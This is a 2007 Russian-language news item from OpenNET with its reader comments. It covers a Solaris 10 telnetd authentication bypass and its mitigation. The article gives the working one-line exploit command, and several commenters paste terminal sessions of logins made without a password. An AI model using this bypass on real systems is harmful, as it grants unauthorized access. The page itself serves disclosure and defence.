The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Критическая проблема безопасности в telnet сервисе Solaris

13.02.2007 13:38

В стандартном telnet сервисе (in.telnetd) Solaris 10 обнаружена уязвимость позволяющая без лишних усилий получить доступ к системе путем комбинации -l и -f опций.

Например, для входа на удаленную систему без пароля под пользователем root достаточно набрать: telnet -l "-froot" host. Суть в передаче аргумента опции "-l" программе login без проверки, login в свою очередь интерпретирует "-f" - как вход без запроса пароля.

Исправление проблемы еще не анонсировано Sun Microsystems, поэтому крайне рекомендуется отключить in.telnetd сервис или заблокировать пакетным фильтром 23 tcp порт.

Примечательно, что в 1994 году идентичная проблема была найдена в сервисе rlogin операционной системы AIX.

  1. Главная ссылка к новости (http://blogs.securiteam.com/in...)
  2. Sun Solaris "in.telnetd" Authentication Bypass
  3. Trivial remote Solaris 0day, disable telnet now.
  4. Full Disclosure: "0day was the case that they gave me"
  5. sunsolve.sun.com: Security Vulnerability in the in.telnetd(1M) Daemon
  6. Solaris telnet 0-day
Лицензия: CC-BY
Тип: К сведению
Короткая ссылка: https://opennet.ru/9842-login
Ключевые слова: login, solaris, telnet
Поддержать дальнейшую публикацию новостей на OpenNET.


Обсуждение (31) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, dvg_lab (??), 14:51, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    к вопросу о том кто у кого код слямзил :-)
     
  • 1.2, lomo (?), 15:34, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Давно так не офигевал от Соляры..
    Промышленные, блин, системы...

    (from linux server to solaris 10 x86 U3 + patches)

    $ telnet -l"-fjimb" sol10
    Trying 10.10.14.3...
    Connected to sol10.
    Escape character is '^]'.
    Last login: Mon Feb 12 12:05:20 from rhel4es-sb
    Sun Microsystems Inc. SunOS 5.10 Generic January 2005
    [jimb@sol10(pts/1) ~]$

     
     
  • 2.25, alk (??), 11:10, 14/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    что то я не понимаю ... у меня такой номер не прошел
    [root@main:/] #telnet -l"froot" 10.0.0.2
    Trying 10.0.0.2...
    Connected to 10.0.0.2.
    Escape character is '^]'.


    SunOS 5.10

    Password:

     
     
  • 3.26, Аноним (-), 11:56, 14/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    telnet -l "-froot" 10.0.0.2
     
     
  • 4.28, alk (??), 14:49, 14/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    Мда.... нехило
    [root@main:/] #telnet -l"falk" 10.0.0.2
    Trying 10.0.0.2...
    Connected to 10.0.0.2.
    Escape character is '^]'.

    SunOS 5.10

    Sourcing //.profile-EIS.....
    alk@cnr1 # uname -a
    SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210

     
     
  • 5.31, мимоход (?), 19:36, 17/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    что-то у меня работает только на десятке, и то не под рутом, на девятке - нет.

    >Мда.... нехило
    >[root@main:/] #telnet -l"falk" 10.0.0.2
    >Trying 10.0.0.2...
    >Connected to 10.0.0.2.
    >Escape character is '^]'.
    >
    >SunOS 5.10
    >
    >Sourcing //.profile-EIS.....
    >alk@cnr1 # uname -a
    >SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210


     
  • 2.30, Квагга (?), 22:13, 14/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    А Соляра другой, простите, ни одного дня не была.

    Вот уже с 95-го на моей памяти все дыры в ней были строго ГОМЕРИЧЕСКОГО масштаба.

    Отродясь это было визиткой Соляры.

     

  • 1.3, Андрей (??), 15:57, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Нормальные люди отключают телнет ( по крайней мере для доступа из инета и др. небезопасных сетей )
     
     
  • 2.5, mike_t (?), 15:59, 13/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    telnets тоже не использовать?
     

  • 1.4, Advanced Аноним (?), 15:59, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    я уверен что число машин с включённым telnetd мизерно, так что, хоть сам факт такой глупой ошибки и вызывает непонятные чувства, но никак не подрывает авторитет Solaris...
     
     
  • 2.6, Advanced Аноним (?), 15:59, 13/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    Кстати, в адвойзари ошибка, под рутом в дефолтной инсталляции нельзя зайти. Только под каким-нибудь другим юзером.
     

  • 1.7, ABorland (?), 16:19, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Неужели кто то еще пользуется телнетом?
     
     
  • 2.8, lionGAD (?), 16:51, 13/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    конечно..
    например у меня вся безопасность лежит на плечах цысок и внутри сети серверы максимально разгружены и бегают по телнету и rsh к друг другу в гости..
     
     
  • 3.9, Dmitry (??), 17:06, 13/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    че правда и внутри телнет руту открыт ?
    ну вы отважный перец :-)
    хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо
    контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу
    все по-нормальному вывели ......
     
     
  • 4.11, lionGAD (?), 17:17, 13/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    > че правда и внутри телнет руту открыт ?
    >ну вы отважный перец :-)
    >хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо
    >контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу
    >все по-нормальному вывели ......
    у меня в сети дураков нету.. не та сеть, не те задачи... просто я привёл пример что телнет всё таки нужен
     
     
  • 5.14, Pavel (??), 17:54, 13/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    Дураки есть везде, в том числе и на этом сайте в постах
     
  • 3.17, emp (??), 19:03, 13/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    у нормальных админов все эти телнеты и рсаши бегают в отдельном влане.
     

  • 1.10, iptables (??), 17:12, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ну и ну, телнет действительно не актуален, но проблемма есть. Что касается удалённого входа, то не думаю, что админ оставит открытым телнет для инета, ибо это уже не админ...
     
  • 1.12, Хомяк (?), 17:21, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Да Солярку в Сеть вообще лучше не выставлять :-)))
     
  • 1.13, adil_18 (??), 17:33, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    да уж
     
  • 1.15, Oles (?), 17:55, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Промышленная система ;)
    SunOS 5.10 Generic_118855-14 i86pc i386 i86pc
    df -h показывает
    /dev/md/dsk/d50        825G 16384E   1.2T 2152924666864% /somemount
    df -k показывает
    /dev/md/dsk/d50      865477325 18446744073261050460 1305323708 2152924666864% /somemount
    эх, бардак...
     
  • 1.16, L.Torvalds (?), 18:44, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ну чего раскудахтались? Ошибки у всех бывают :) Хотя конечно неприято ...
    По делу надо добавить:
    - подвержены _только_ Solaris 10. Старые соляры все держат пучком :)
    - root'ом не зайдешь. Можно только юзером. Утешение слабое, но на безрыбьи ...

    Самое паскудное - патча нет. Второй день пошел. Для тех кому telnet таки нужен, очень "горячий" второй fu*ng день :-/

     
  • 1.18, Аноним (-), 19:21, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    а на Sol9 sun не работает это
     
  • 1.19, morph (??), 20:03, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    телнет к сожалению остался на еще момедах, коммутаторах и прочей лабуде. Интересно, неужели sshd на сервере хавает ресурсов больше? Вернее...неверно вопрос задал - в масштабе производительности хорошего сервера (даже на x86) будет заметна разница?
     
     
  • 2.21, гость (?), 21:40, 13/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    Если железо не на помойке подобрано, то ничего заметно не будет при условии что количество сессий и объем трафика в них не выражаются 4х значными числами.
     

  • 1.20, fi (?), 21:39, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Многие проги под виндоус исторически заточены работать с сервером без ssh.  Конечно, все внутри, но где гарантия , что изнутри нет желающих.

    Более того, когда у нас админы опечаленные положением дел, без предупреждения закрыли сервисы (telnet и rexec) - народ взвыл! открыли в тот же вечер - переконфигурировать всех клиентов было не реально :))))

     
  • 1.22, Аноним (-), 23:59, 13/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим telnet, на рутера и сервера - ssh only.
     
     
  • 2.23, ламусанонимус (?), 00:09, 14/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    >Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим
    >telnet, на рутера и сервера - ssh only.
    Напоминает виндузевый подход - если с фаерволом, антивирусом и браузер не IE использовать то даже вроде и не очень дырявая система получается :)
     

  • 1.24, Аноним (-), 07:51, 14/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Да лан, что никто не помнит дыру в том же телнете под четвертой фряхой ?
     
     
  • 2.29, FSA (??), 21:45, 14/02/2007 [^] [^^] [^^^] [ответить]  
  • +/
    Сколько себя помню, а начинал с FreeBSD 4.x, ни разу не пользовался телнетом... В голову просто не приходило, SSH хватает.
     

  • 1.27, Аноним (-), 12:15, 14/02/2007 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    ISR (Interim Security Relief) patches are now available for the Solaris 10
    in.telnetd vulnerability from http://sunsolve.sun.com/tpatches

    The Descriptions and readme links are currently empty, but they should be there
    shortly.

    The ISR's are :

    IDR125456-01.zip  -  Solaris 10 SPARC
    IDR125457-01.zip  -  Solaris 10 x86

    Patch 120068-01 (SPARC) or 120069-01 (x86) are required patches, however none of
    these patches/ISR's require a reboot and they will take effect immediately.

     
     Добавить комментарий
    Имя:
    E-Mail:
    Текст:
    При перепечатке указание ссылки на opennet.ru обязательно



    Спонсоры:
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2021 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру